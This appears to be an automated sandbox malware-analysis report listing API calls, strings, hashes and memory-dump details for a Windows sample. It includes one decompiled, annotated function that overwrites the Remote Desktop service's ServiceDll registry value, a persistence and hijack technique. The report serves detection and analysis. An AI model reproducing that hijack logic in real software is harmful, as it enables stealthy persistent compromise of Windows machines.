                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,02E5E020,?,?,02D1E451,?,?), ref: 02D1DE51
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,00000000,02D235AB,?,?,?,02D215B2,?,?,80000001), ref: 02D20FE6
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,02D215B2,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 02D2100A
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    Strings
                                                                    • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 02D1DE2C
                                                                    • ServiceDll, xrefs: 02D1DE5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                                                    • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                                    • API String ID: 1903904756-387424650
                                                                    • Opcode ID: d8f85b3c635b027089f3fad9dd4a810c41196634d9928d14c1dfd26c5477c154
                                                                    • Instruction ID: 45513815018f260fbfc4f22377b0010649c66831e6a423a3c6063dfa66564733
                                                                    • Opcode Fuzzy Hash: d8f85b3c635b027089f3fad9dd4a810c41196634d9928d14c1dfd26c5477c154
                                                                    • Instruction Fuzzy Hash: 86112E71D40218BBDB14EBA4E955CEEB77AEFA0701F5001A9984263780EB305F08CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1D9B6(void* __ecx, void* __edx) {
                                                                    				/* Decompiler output, annotated: overwrites the ServiceDll value of the
                                                                    				   TermService (Remote Desktop) service under HKLM. Helper roles are
                                                                    				   taken from the "APIs" list of this report. A write to this value by
                                                                    				   anything other than Windows servicing is a high-signal detection
                                                                    				   point (e.g. Sysmon Event ID 13 on this key path). */
                                                                    				void* _v12;     /* HKEY returned by RegOpenKeyExW */
                                                                    				void* _v16;     /* heap string "ServiceDll" */
                                                                    				short* _v20;    /* heap copy of the subkey path (wide string) */
                                                                    				int _v24;
                                                                    				char _v28;
                                                                    				char _v36;      /* buffer holding the new value data */
                                                                    				void* _t26;
                                                                    				void* _t28;
                                                                    				void* _t43;
                                                                    				int _t44;       /* return value: 1 if the value was written */
                                                                    				void* _t45;     /* object pointer; the new path is read from offset 0x34 */
                                                                    
                                                                    				_t43 = __edx;
                                                                    				_t45 = __ecx;
                                                                    				_t44 = 0;
                                                                    				_v12 = 0;
                                                                    				/* E02D135E5 wraps lstrlenW/lstrcpyW: allocate and copy the subkey path */
                                                                    				E02D135E5( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                                                    				_v28 = 0;
                                                                    				_v24 = 0;
                                                                    				/* 0x80000002 = HKEY_LOCAL_MACHINE; 0x102 = KEY_SET_VALUE | KEY_WOW64_64KEY */
                                                                    				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
                                                                    					/* build the new value data from the field at _t45 + 0x34 */
                                                                    					_t26 = E02D13221(_t45 + 0x34, _t43,  &_v36);
                                                                    					/* E02D21039 wraps RegSetValueExW; type 2 = REG_EXPAND_SZ */
                                                                    					_t28 = E02D21039( &_v12, E02D135E5( &_v16, L"ServiceDll"), _t26, 2);
                                                                    					E02D15EA5(_v16);   /* E02D15EA5 wraps VirtualFree */
                                                                    					_v16 = 0;
                                                                    					E02D13036( &_v36);
                                                                    					E02D20FAE( &_v12); /* E02D20FAE wraps RegCloseKey */
                                                                    					if(_t28 != 0) {
                                                                    						_t44 = 1;   /* value written successfully */
                                                                    					}
                                                                    				}
                                                                    				E02D13036( &_v28);
                                                                    				E02D15EA5(_v20);
                                                                    				E02D20FAE( &_v12);
                                                                    				return _t44;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 02D1D9EA
                                                                      • Part of subcall function 02D21039: RegSetValueExW.KERNEL32(?,745D0770,00000000,?,?,?,?,?,02D21432,00000000,00000000,?,00000001,?,?,?), ref: 02D21058
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    Strings
                                                                    • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 02D1D9C2
                                                                    • ServiceDll, xrefs: 02D1DA03
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                                                    • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                                    • API String ID: 2854241163-387424650
                                                                    • Opcode ID: d6b89ad506c9cf2d9055b815ffe70c60a8d720472b04b40e034ff0d187a44fb7
                                                                    • Instruction ID: 50f351748e7f252158007a71cddb45892a4ad9960a62b79f7b3d502a0ee7a0a4
                                                                    • Opcode Fuzzy Hash: d6b89ad506c9cf2d9055b815ffe70c60a8d720472b04b40e034ff0d187a44fb7
                                                                    • Instruction Fuzzy Hash: 45112171D04218BBDB14EFA1EC95DEEBB7AEFA4704F504469D90272780EB305E49CE60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 0040E1EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                    • String ID: InitializeCriticalSectionEx$}@
                                                                    • API String ID: 2593887523-4085474595
                                                                    • Opcode ID: 2c3dc51cbebd3ab8ce306e6f470516fba26f4ff61fd39562ff9922b90c40d4a0
                                                                    • Instruction ID: 140e3a5272cfac2ffecfe7133136927115ec45d1775a7d4ec2ec2377cad9d731
                                                                    • Opcode Fuzzy Hash: 2c3dc51cbebd3ab8ce306e6f470516fba26f4ff61fd39562ff9922b90c40d4a0
                                                                    • Instruction Fuzzy Hash: 75F0E931A4521CB7CF016F51DC15EEE7F66DF08B54B00813EFD096A291DE354D22E689
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Alloc
                                                                    • String ID: FlsAlloc$}@
                                                                    • API String ID: 2773662609-1616921099
                                                                    • Opcode ID: 2a9e89903c9cbd0d46d5528f1686c51d81a83a499680331cd7b225bbaf66830d
                                                                    • Instruction ID: 2cce59ed5c61953386e017ba8935e43ea3336fcd5f105658b23cc269874d5e8e
                                                                    • Opcode Fuzzy Hash: 2a9e89903c9cbd0d46d5528f1686c51d81a83a499680331cd7b225bbaf66830d
                                                                    • Instruction Fuzzy Hash: 75E02030B8421877C6006B619D12AEE7A60CB14B10B00413EFD05A2281DE791D1385DE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Free
                                                                    • String ID: FlsFree$}@
                                                                    • API String ID: 3978063606-129253568
                                                                    • Opcode ID: 8df303f5c03126cfd124ba08305a6b4d50de19d40249e01cf871eef3f544e533
                                                                    • Instruction ID: 1c1fe7254dd62704444ddffa9ddea7fc5b957092a08765c2d176ce758b829968
                                                                    • Opcode Fuzzy Hash: 8df303f5c03126cfd124ba08305a6b4d50de19d40249e01cf871eef3f544e533
                                                                    • Instruction Fuzzy Hash: F6E0E531F45118B7C7046B629C12FAEBBA1CB09B00B14817EFD05A7280DEB99D1296DE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CommandLine
                                                                    • String ID: @4o
                                                                    • API String ID: 3253501508-3925662700
                                                                    • Opcode ID: 761cf7526a0e620914772b70ee89a2da9fb3c25c6c13e28083df03d00471ffdf
                                                                    • Instruction ID: aa52f304b9edc2b4dd3836b1944c731c81339586f548868786e4e785ce0a5913
                                                                    • Opcode Fuzzy Hash: 761cf7526a0e620914772b70ee89a2da9fb3c25c6c13e28083df03d00471ffdf
                                                                    • Instruction Fuzzy Hash: 10B048BC8026048B87918F69B8480883FA0B3AA20A39040E9D405C2A20DB380048AB18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 02F49340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 02F4938B
                                                                      • Part of subcall function 02F49340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 02F493CC
                                                                      • Part of subcall function 02F49340: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 02F493EC
                                                                      • Part of subcall function 02F49340: _malloc.LIBCMT ref: 02F493F9
                                                                      • Part of subcall function 02F49340: _free.LIBCMT ref: 02F49408
                                                                    • GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 02F4953B
                                                                      • Part of subcall function 02F47760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,761B5420,02F4908D,00000000,00000000,7620F560), ref: 02F47770
                                                                      • Part of subcall function 02F47760: _malloc.LIBCMT ref: 02F4777C
                                                                      • Part of subcall function 02F47760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 02F47796
                                                                      • Part of subcall function 02F47760: _free.LIBCMT ref: 02F477A1
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00000000,?,?), ref: 02F49572
                                                                    • _malloc.LIBCMT ref: 02F4957A
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,?), ref: 02F4959E
                                                                    • _free.LIBCMT ref: 02F495A5
                                                                    • GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 02F495E0
                                                                    • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 02F4962E
                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 02F49663
                                                                    • _free.LIBCMT ref: 02F4966C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiVersionWide_free$_malloc$DiskFreeSpace$FullNamePath
                                                                    • String ID:
                                                                    • API String ID: 2298454362-0
                                                                    • Opcode ID: 523f6ad734f39696d714b63bc7f5a1a6f827b975d5061f73ca5f8c9efdb13dd0
                                                                    • Instruction ID: f35b2f6544baaf495a0e5f05c53a182082173851f6cfa88d16025d5918bc0600
                                                                    • Opcode Fuzzy Hash: 523f6ad734f39696d714b63bc7f5a1a6f827b975d5061f73ca5f8c9efdb13dd0
                                                                    • Instruction Fuzzy Hash: 8B41A572F002189FDB26DB64DC85BEBB7ACAB05794F1405A9E609DB180EFF05A80CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: DISTINCT$GROUP BY$ORDER BY$only a single result allowed for a SELECT that is part of an expression$too many terms in compound SELECT
                                                                    • API String ID: 2102423945-95127808
                                                                    • Opcode ID: 1f13554b825f6c805969814e472a2f7a284bc2822f5df311ec79568281c52f83
                                                                    • Instruction ID: fd0cf5224560b21aa5b370f041b545e6ecaabaa3dbda821aebb5891801f2ffbe
                                                                    • Opcode Fuzzy Hash: 1f13554b825f6c805969814e472a2f7a284bc2822f5df311ec79568281c52f83
                                                                    • Instruction Fuzzy Hash: D5236D71A047419FDB24CF18C880A6AB7F2FF89344F14896EEA8A8B351D771E945CF52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: ($API call with %s database connection pointer$d$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$invalid$misuse at line %d of [%.10s]
                                                                    • API String ID: 2102423945-2789757714
                                                                    • Opcode ID: 04cb0a8ea7fcfee0fb9050c6073344c033e915b59564931191ad4318bbe48413
                                                                    • Instruction ID: 4d47df5c733158365bed1e40ba1eb86156040f55c427cc21078f942db503c513
                                                                    • Opcode Fuzzy Hash: 04cb0a8ea7fcfee0fb9050c6073344c033e915b59564931191ad4318bbe48413
                                                                    • Instruction Fuzzy Hash: A222C1B5A043019BDB24EF18D880B2AFBE9BF44788F140469FB45DB341E771E950CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: :memory:
                                                                    • API String ID: 2102423945-2920599690
                                                                    • Opcode ID: b6d47d23cf994d8e36cdfa5a388a04ca4c80e3b508485a38c54fe5053e087314
                                                                    • Instruction ID: a6efff03b420484df10830a986e1a15a22fb543759e77542b5d601919066cdc6
                                                                    • Opcode Fuzzy Hash: b6d47d23cf994d8e36cdfa5a388a04ca4c80e3b508485a38c54fe5053e087314
                                                                    • Instruction Fuzzy Hash: 9012E9B0E002648FDB21CF28D884BAABBB5BF01388F1441A9DF599B352D775D994CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetVersionExW.KERNEL32 ref: 02F48E33
                                                                      • Part of subcall function 02F47760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,761B5420,02F4908D,00000000,00000000,7620F560), ref: 02F47770
                                                                      • Part of subcall function 02F47760: _malloc.LIBCMT ref: 02F4777C
                                                                      • Part of subcall function 02F47760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 02F47796
                                                                      • Part of subcall function 02F47760: _free.LIBCMT ref: 02F477A1
                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 02F48EDB
                                                                    • CreateFileW.KERNEL32(00000000,?,00000003,00000000,?,?,00000000), ref: 02F48F09
                                                                    • CreateFileA.KERNEL32(00000000,?,00000003,00000000,?,?,00000000), ref: 02F48F1C
                                                                    • GetLastError.KERNEL32 ref: 02F48F2B
                                                                    • _free.LIBCMT ref: 02F48F35
                                                                    Strings
                                                                    • cannot open file at line %d of [%.10s], xrefs: 02F48F85
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 02F48F7B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharCreateFileMultiVersionWide_free$ErrorLast_malloc
                                                                    • String ID: cannot open file at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 3782002744-850067789
                                                                    • Opcode ID: 5794b4260ab45f7b8934b71a65b552d3caa3e06837ad63ea73b541fdc1dff2bd
                                                                    • Instruction ID: bc3b2e15ae0fd6a3195e111866fdf6074a1f7cea407dc04e6d338279336e947f
                                                                    • Opcode Fuzzy Hash: 5794b4260ab45f7b8934b71a65b552d3caa3e06837ad63ea73b541fdc1dff2bd
                                                                    • Instruction Fuzzy Hash: 07719FB1A083059FD724DF69E881A5BBBE5FB88794F404A2DF559C3280DB74D904CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: BINARY$MATCH$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                    • API String ID: 2102423945-2494281147
                                                                    • Opcode ID: 52e57b5b7372ffa6ea28dc80772c6a792d3378118fb8647d54917100f4cb044e
                                                                    • Instruction ID: 5e1e18b555ff3b4aa364583037e1629ac4471ca3e74e0500e1f329bca9faddbb
                                                                    • Opcode Fuzzy Hash: 52e57b5b7372ffa6ea28dc80772c6a792d3378118fb8647d54917100f4cb044e
                                                                    • Instruction Fuzzy Hash: 5CA103F1E00314ABEB219F28DCD5B977A99AF05794F480465EE0AAF342D7B5D840CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$File$PointerRead_memset
                                                                    • String ID:
                                                                    • API String ID: 1220473449-0
                                                                    • Opcode ID: 131a7190bc706cf2911ea70bbabb59b019d57852f2986a1597de004656ba1d45
                                                                    • Instruction ID: 309dce97972ba591d6f5a47c84602632936d93bc99a90ea7dd3f32786102d8a9
                                                                    • Opcode Fuzzy Hash: 131a7190bc706cf2911ea70bbabb59b019d57852f2986a1597de004656ba1d45
                                                                    • Instruction Fuzzy Hash: 37117872A44208ABD710DE69EC81FAAF7ACFB447B4F104656FD18C7680DB71ED5086E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 02F8A8B9
                                                                      • Part of subcall function 02F61120: _memset.LIBCMT ref: 02F6116B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: ($database schema is locked: %s$statement too long
                                                                    • API String ID: 2102423945-3861767200
                                                                    • Opcode ID: 204cd9216eccbc4ca0b170f1c6c011a597c46306fcab24d6001aefdd92b591c8
                                                                    • Instruction ID: 8a6945fbceb7b366056c8e8ad0054d38537f1726e8e7d635d5e52fa73ba2fe2c
                                                                    • Opcode Fuzzy Hash: 204cd9216eccbc4ca0b170f1c6c011a597c46306fcab24d6001aefdd92b591c8
                                                                    • Instruction Fuzzy Hash: 53F1C671A043019FD714EF28D880B6AF7E1FF85788F04456EEA8A9B341EB74E945CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: ($-journal
                                                                    • API String ID: 2102423945-1587918665
                                                                    • Opcode ID: 2cceca3d598e37e2945d65bd6f1a3cf0b47f87b35ead1d146be235cb94febbc2
                                                                    • Instruction ID: 1ffc7f6027b7006eba15b832f1ff29da7d42b34857af7b6bbe2003ada0dba411
                                                                    • Opcode Fuzzy Hash: 2cceca3d598e37e2945d65bd6f1a3cf0b47f87b35ead1d146be235cb94febbc2
                                                                    • Instruction Fuzzy Hash: 7FC1DFB1E007059BDB20CF68C880B9BBBF5BF44354F18896DDA698B381EB74E545CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 02F54F94
                                                                      • Part of subcall function 02F4D4E0: _memset.LIBCMT ref: 02F4D514
                                                                    Strings
                                                                    • database corruption at line %d of [%.10s], xrefs: 02F54E6B
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 02F54E61
                                                                    • SQLite format 3, xrefs: 02F54F6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: SQLite format 3$database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-3910250768
                                                                    • Opcode ID: 0507b5b02abac0472fd561ea8c86e514d735104224105a9d653cdd67d40d02fb
                                                                    • Instruction ID: 2c721bae7818637b94fd72fe119568e7f000a110039951403a3b8cb338a2c980
                                                                    • Opcode Fuzzy Hash: 0507b5b02abac0472fd561ea8c86e514d735104224105a9d653cdd67d40d02fb
                                                                    • Instruction Fuzzy Hash: 83B1BFB1A083229FD714CF28D48071ABBE1BF84394F148A5DEE998B645D771E984CFD2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 0-1231421067
                                                                    • Opcode ID: a07db6f8be67790f40c3dac147f992e95bbd690848aa14389d5d02ff2402ead6
                                                                    • Instruction ID: 9a9cc577b5878ea70efd41436739870de50a89ccad06fd51aea927f592ab298e
                                                                    • Opcode Fuzzy Hash: a07db6f8be67790f40c3dac147f992e95bbd690848aa14389d5d02ff2402ead6
                                                                    • Instruction Fuzzy Hash: 9D51C471B002209BF7219E69DC81B5677A2EF547E8F144559EF289B281DBB1E881CFD0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID:
                                                                    • API String ID: 2102423945-0
                                                                    • Opcode ID: e03fe9127c9d733032cbc01fd55d734dfaa4255945131f8314c39837359b6722
